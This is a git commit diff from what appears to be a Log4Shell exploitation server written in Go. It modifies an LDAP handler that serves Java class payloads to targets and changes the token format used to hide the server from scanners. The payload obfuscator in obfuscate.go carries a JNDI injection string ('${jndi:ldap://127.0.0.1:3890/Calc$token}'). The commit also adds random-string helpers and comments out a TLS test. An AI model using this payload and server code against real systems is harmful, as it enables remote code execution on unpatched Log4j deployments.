change token split symbol, improve Obfuscate, update random.

Author: For-ACGN

autocert_test.go

@@ -1,64 +1,54 @@
 package log4shell
 
-import (
-	"crypto/tls"
-	"fmt"
-	"net/http"
-	"testing"
-
-	"github.com/stretchr/testify/require"
-	"golang.org/x/crypto/acme/autocert"
-)
-
-func TestNewListener(t *testing.T) {
-	const testDomain = "test"
-
-	mux := http.NewServeMux()
-	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
-		fmt.Fprintf(w, "Hello, TLS user! Your config: %+v", r.TLS)
-	})
-	server := http.Server{}
-	server.Handler = mux
-	go func() {
-
-		http.DefaultClient.Transport = &http.Transport{}
-
-		listener := autocert.NewListener(testDomain)
-		conn, err := listener.Accept()
-		require.NoError(t, err)
-
-		buf := make([]byte, 4096)
-		n, err := conn.Read(buf)
-		fmt.Println("err:", err)
-		fmt.Println(string(buf[:n]))
-
-		fmt.Println(conn.RemoteAddr())
-
-		// log.Fatal(server.Serve(autocert.NewListener("example.com")))
-	}()
-
-	cfg := tls.Config{
-		ServerName: testDomain,
-	}
-
-	client := http.Client{
-		Transport: &http.Transport{
-			TLSClientConfig: &cfg,
-		},
-	}
-
-	req, err := http.NewRequest(http.MethodGet, "https://127.0.0.1:443/", nil)
-	require.NoError(t, err)
-	req.Host = testDomain
-
-	resp, err := client.Do(req)
-	require.NoError(t, err)
-
-	fmt.Println(resp.StatusCode)
-
-	// conn, err := tls.Dial("tcp", "127.0.0.1:443", &cfg)
-	// require.NoError(t, err)
-	//
-	// _, err = conn.Write([]byte{1, 2, 3, 4})
-	// require.NoError(t, err)
-}
+// func TestNewListener(t *testing.T) {
+// 	const testDomain = "test"
+//
+// 	mux := http.NewServeMux()
+// 	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
+// 		fmt.Fprintf(w, "Hello, TLS user! Your config: %+v", r.TLS)
+// 	})
+// 	server := http.Server{}
+// 	server.Handler = mux
+// 	go func() {
+//
+// 		http.DefaultClient.Transport = &http.Transport{}
+//
+// 		listener := autocert.NewListener(testDomain)
+// 		conn, err := listener.Accept()
+// 		require.NoError(t, err)
+//
+// 		buf := make([]byte, 4096)
+// 		n, err := conn.Read(buf)
+// 		fmt.Println("err:", err)
+// 		fmt.Println(string(buf[:n]))
+//
+// 		fmt.Println(conn.RemoteAddr())
+//
+// 		// log.Fatal(server.Serve(autocert.NewListener("example.com")))
+// 	}()
+//
+// 	cfg := tls.Config{
+// 		ServerName: testDomain,
+// 	}
+//
+// 	client := http.Client{
+// 		Transport: &http.Transport{
+// 			TLSClientConfig: &cfg,
+// 		},
+// 	}
+//
+// 	req, err := http.NewRequest(http.MethodGet, "https://127.0.0.1:443/", nil)
+// 	require.NoError(t, err)
+// 	req.Host = testDomain
+//
+// 	resp, err := client.Do(req)
+// 	require.NoError(t, err)
+//
+// 	fmt.Println(resp.StatusCode)
+//
+// 	// conn, err := tls.Dial("tcp", "127.0.0.1:443", &cfg)
+// 	// require.NoError(t, err)
+// 	//
+// 	// _, err = conn.Write([]byte{1, 2, 3, 4})
+// 	// require.NoError(t, err)
+// }

ldap.go

@@ -39,24 +39,24 @@ func (h *ldapHandler) handleSearch(w ldapserver.ResponseWriter, m *ldapserver.Me
 	dn := string(req.BaseObject())
 
 	// check class name has token
-	if strings.Contains(dn, "_") {
+	if strings.Contains(dn, "$") {
 		// parse token
-		sections := strings.SplitN(dn, "_", 2)
+		sections := strings.SplitN(dn, "$", 2)
 		class := sections[0]
 		if class == "" {
 			h.logger.Printf("[warning] %s search invalid java class \"%s\"", addr, dn)
-			h.sendError(w)
+			h.sendErrorResult(w)
 			return
 		}
 		// check token is already exists
 		token := sections[1]
 		if token == "" {
 			h.logger.Printf("[warning] %s search java class with invalid token \"%s\"", addr, dn)
-			h.sendError(w)
+			h.sendErrorResult(w)
 			return
 		}
 		if !h.checkToken(token) {
-			h.sendError(w)
+			h.sendErrorResult(w)
 			return
 		}
 		dn = class
@@ -68,12 +68,12 @@ func (h *ldapHandler) handleSearch(w ldapserver.ResponseWriter, m *ldapserver.Me
 	fi, err := os.Stat(filepath.Join(h.payloadDir, dn+".class"))
 	if err != nil {
 		h.logger.Printf("[error] %s failed to search java class \"%s\": %s", addr, dn, err)
-		h.sendError(w)
+		h.sendErrorResult(w)
 		return
 	}
 	if fi.IsDir() {
 		h.logger.Printf("[error] %s searched java class \"%s\" is a directory", addr, dn)
-		h.sendError(w)
+		h.sendErrorResult(w)
 		return
 	}
 
@@ -108,7 +108,7 @@ func (h *ldapHandler) checkToken(token string) bool {
 	return true
 }
 
-func (h *ldapHandler) sendError(w ldapserver.ResponseWriter) {
+func (h *ldapHandler) sendErrorResult(w ldapserver.ResponseWriter) {
 	done := ldapserver.NewSearchResultDoneResponse(ldapserver.LDAPResultNoSuchObject)
 	w.Write(done)
 }

log4shell.go

@@ -110,7 +110,7 @@ func New(cfg *Config) (*Server, error) {
 
 	// generate random string and add it to the http handler
 	// for prevent some http spider or exploit server scanner
-	secret := randString(8)
+	secret := randSecret()
 
 	// initialize http server
 	httpListener, err := net.Listen(cfg.HTTPNetwork, cfg.HTTPAddress)

obfuscate.go

@@ -32,10 +32,11 @@ func Obfuscate(raw string, token bool) (string, string) {
 	// add token to the end of class name
 	var rwt string // raw with token
 	if token {
+		// ${jndi:ldap://127.0.0.1:3890/Calc$token}
 		front := raw[:len(raw)-1]
 		token := randString(16)
 		last := string(raw[len(raw)-1])
-		raw = fmt.Sprintf("%s_%s%s", front, token, last)
+		raw = fmt.Sprintf("%s$%s%s", front, token, last)
 
 		rwt = raw
 		l = len(raw)

rand.go

@@ -14,6 +14,39 @@ func randBool() bool {
 }
 
 func randString(n int) string {
+	str := make([]rune, n)
+	for i := 0; i < n; i++ {
+		s := ' ' + 1 + rand.Intn(90) // #nosec
+		switch {
+		case s >= '0' && s <= '9':
+		case s >= 'A' && s <= 'Z':
+		case s >= 'a' && s <= 'z':
+		case isValidSymbol(s):
+		default:
+			i--
+			continue
+		}
+		str[i] = rune(s)
+	}
+	return string(str)
+}
+
+func isValidSymbol(s int) bool {
+	switch s {
+	case '(', ')':
+	case '*', '.':
+	case '$', '_':
+	case '[', ']':
+	case '@', '=':
+	default:
+		return false
+	}
+	return true
+}
+
+func randSecret() string {
+	const n = 8
+
 	str := make([]rune, n)
 	for i := 0; i < n; i++ {
 		s := ' ' + 1 + rand.Intn(90) // #nosec